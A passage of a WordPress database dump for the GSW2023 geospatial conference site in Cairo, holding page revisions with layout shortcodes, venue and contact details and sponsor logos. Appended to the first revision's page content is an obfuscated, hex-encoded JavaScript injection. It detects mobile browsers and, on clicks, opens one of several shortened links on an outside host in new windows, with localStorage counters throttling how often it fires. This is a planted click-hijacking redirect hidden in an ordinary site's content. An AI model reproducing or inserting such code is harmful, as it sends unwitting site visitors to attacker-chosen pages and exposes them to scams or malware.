</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:28:35','2023-08-16 00:28:35','',3066,'https://gsw2023.com/?p=5255',0,'revision','',0),
(5256,1,'2023-08-16 00:28:55','2023-08-16 00:28:55','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145556440{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145629353{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" 